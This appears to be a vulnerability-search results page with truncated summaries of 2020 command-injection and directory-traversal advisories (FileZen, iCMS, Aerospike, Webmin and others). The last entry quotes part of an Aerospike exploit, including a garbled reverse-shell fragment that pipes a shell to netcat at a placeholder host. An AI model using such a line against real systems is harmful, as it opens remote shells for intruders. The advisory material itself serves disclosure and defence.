9789 matches found
CVE-2020-5639
Directory traversal vulnerability in FileZen versions from V3.0.0 to V4.2.2 allows remote attackers to upload an arbitrary file in a specific directory via unspecified vectors. As a result, an arbitrary OS command may be executed...
CVE-2020-12149
CVE-2020-12149 affects Silver Peak Unity ECOS appliances and relates to a command injection in the configuration backup/restore function. The root cause is that the user-controlled config filename is incorporated directly into a subsequent shell command, enabling an authenticated attacker with ac...
CVE-2020-12149 OS Command Injection - Management File Upload
The configuration backup/restore function in Silver Peak Unity ECOS™ (ECOS) appliance software was found to directly incorporate the user-controlled config filename in a subsequent shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. This...
Aerospike Database UDF Lua Code Execution Exploit
Aerospike Database versions before 5.1.0.3 permitted user-defined functions (UDFs) to call the os.execute Lua function. This Metasploit module creates a UDF that uses this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This modu...
JVN#55917325: Multiple vulnerabilities in Aterm SA3500G
Aterm SA3500G provided by NEC Corporation contains multiple vulnerabilities listed below.

OS command injection (CWE-78) - CVE-2020-5635

| Version | Vector | Score |
|---|---|---|
| CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Base Score: 8.8 |
| CVSS v2 | AV:A/AC:L/Au:N/C:P/I:P/A:P | Base Score: 5.8 |

OS...
The vulnerability in XStream, a Java library for converting objects to XML or JSON, arises from a failure to neutralize special elements used in operating system commands (CWE-78). It allows attackers to execute arbitrary code.
The vulnerability in XStream, a Java library for converting objects to XML or JSON, exists because special elements used in operating system commands are not neutralized. Exploiting this vulnerability can allow a remote attacker to execute arbitrary code...
CVE-2020-19527
iCMS 7.0.14 allows attackers to execute arbitrary OS commands via shell metacharacters in the DBNAME parameter to install/install.php...
CVE-2020-19142
iCMS 7 allows attackers to execute arbitrary OS commands via shell metacharacters in the DBPREFIX parameter to install/install.php...
CVE-2020-19142
The CVE-2020-19142 entry describes a vulnerability in iCMS 7 where an attacker can execute arbitrary OS commands by injecting shell metacharacters into the DB_PREFIX parameter used by install/install.php. The issue permits unauthenticated remote command execution with high to critical impact (as ...
CVE-2020-19527
CVE-2020-19527 affects iCMS 7.0.14. An attacker can execute arbitrary OS commands by injecting shell metacharacters into the DB_NAME parameter in install/install.php. Documented impact is critical (C/H/I/A) with network attack vector and no user interaction. No remediation/version details are pro...
FileZen vulnerable to directory traversal
Overview
FileZen provided by Soliton Systems K.K. is an appliance for secure file transfer and sharing by mail or a web interface. FileZen contains a directory traversal vulnerability (CWE-22). Soliton Systems K.K. reported this vulnerability to IPA to notify users of its solution through JVN...
JVN#12884935: FileZen vulnerable to directory traversal
FileZen provided by Soliton Systems K.K. is an appliance for secure file transfer and sharing by mail or a web interface. FileZen contains a directory traversal vulnerability (CWE-22).
Impact
A remote attacker may upload an arbitrary file in the specific directory in the product. If a specialy...
Cisco Jabber Operating System Command Injection Vulnerability
Cisco Jabber for Windows and Cisco Jabber are both products of Cisco, a U.S. company. Cisco Jabber for Windows is a set of unified communications client solutions for the Windows platform. The program provides online status display, instant messaging, voice and other functions. Cisco Jabber is a...
Exploit for OS Command Injection in Webmin
CVE-2019-15107 This repo contains a small script in bash to e...
Prototype Pollution
systeminformation is vulnerable to prototype pollution. An attacker is able to overwrite arbitrary properties and functions of an object such as `prototype` or `__proto__`, potentially resulting in OS command execution...
Design/Logic Flaw
This affects the package systeminformation before 4.30.2. The attacker can overwrite the properties and functions of an object, which can lead to executing OS commands...
CVE-2020-7778
This affects the package systeminformation before 4.30.2. The attacker can overwrite the properties and functions of an object, which can lead to executing OS commands...
Aerospike Database 5.1.0.3 Remote Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
Date: 2020-08-01
Exploit Author: Matt S
Vendor Homepage: https://www.aerospike.com/
Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...